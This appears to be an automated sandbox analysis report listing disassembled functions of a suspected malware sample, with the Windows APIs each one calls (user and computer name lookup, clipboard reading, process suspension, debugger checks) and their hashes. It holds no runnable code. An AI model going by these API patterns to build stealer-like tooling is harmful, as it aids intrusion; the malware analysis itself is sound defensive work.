                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,(x), ref: 0041B62A
                                • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Name$ComputerUser
                                • String ID: (x
                                • API String ID: 4229901323-2016957024
                                • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorInfoLastLocale$_free$_abort
                                • String ID:
                                • API String ID: 2829624132-0
                                • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Context$AcquireRandomRelease
                                • String ID:
                                • API String ID: 1815803762-0
                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenClipboard.USER32(00000000), ref: 0040B711
                                • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                • CloseClipboard.USER32 ref: 0040B725
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseDataOpen
                                • String ID:
                                • API String ID: 2058664381-0
                                • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                                • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                                • CloseHandle.KERNEL32(00000000,?,?,00415FFF,00000000), ref: 0041BB2A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpenSuspend
                                • String ID:
                                • API String ID: 1999457699-0
                                • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                                • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                                • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                                • CloseHandle.KERNEL32(00000000,?,?,00416024,00000000), ref: 0041BB56
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpenResume
                                • String ID:
                                • API String ID: 3614150671-0
                                • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                                • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,000000FF,?,00000008,PkGNG,PkGNG,00453326,000000FF,?,00000008,?,?,004561DD,00000000), ref: 00453558
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID: PkGNG
                                • API String ID: 3997070919-263838557
                                • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                • Instruction ID: ef9cfcefdd20db456822e604066c987cb5d00f1002a97bdaec88d2537339d9b1
                                • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                • Instruction Fuzzy Hash: 40B16C311106089FD715CF28C48AB657BE0FF053A6F258659EC9ACF3A2C739DA96CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-3916222277
                                • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                • API String ID: 1084509184-3316369744
                                • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID: lJD
                                • API String ID: 1084509184-3316369744
                                • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: GetLocaleInfoEx
                                • API String ID: 2299586839-2904428671
                                • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG$A
                                • API String ID: 0-652289354
                                • Opcode ID: 5bd247f65566e5dcac570d963c8fc58fd9122a78ba50124b87c8ae73a408a6cb
                                • Instruction ID: 79373b44a76dcf5e8091c0b891bec819a00bcae964dee749e010b71610d2b526
                                • Opcode Fuzzy Hash: 5bd247f65566e5dcac570d963c8fc58fd9122a78ba50124b87c8ae73a408a6cb
                                • Instruction Fuzzy Hash: F7B1A5795142998ACF05EF28C4913F63BA1EF6A300F4851B9EC9DCF757D2398506EB24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$PkGNG
                                • API String ID: 0-1056914901
                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                • Instruction ID: b97fed3bff06dc01e1c808345b9e1576e5435f58d5e0cb17a963d6e43aa39459
                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                • Instruction Fuzzy Hash: C8516A21E01A4496DB38892964D67BF67A99B1E304F18390FE443CB7C2C64DED06C35E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                • HeapFree.KERNEL32(00000000), ref: 004120EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$FreeProcess
                                • String ID:
                                • API String ID: 3859560861-0
                                • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                • Instruction ID: aa2317f629b7fe23c078ec1ce6c5eb8ae6c7f7e5ba67e2b2e47e92e01b9ebfde
                                • Opcode Fuzzy Hash: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                • Instruction Fuzzy Hash: A4126F32B083008BD714EF6AD851A1FB3E2BFCC758F15892EF585A7391DA34E9058B46
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: c9aaf453693c51d24ca7a3c4a4ceab2933bddcf98470505b98e2a27e306b013f
                                • Instruction ID: c5d71c01a3a4c2ba568a1e95f45065819b1df519d68335ab1a8a94a68da0c1ef
                                • Opcode Fuzzy Hash: c9aaf453693c51d24ca7a3c4a4ceab2933bddcf98470505b98e2a27e306b013f
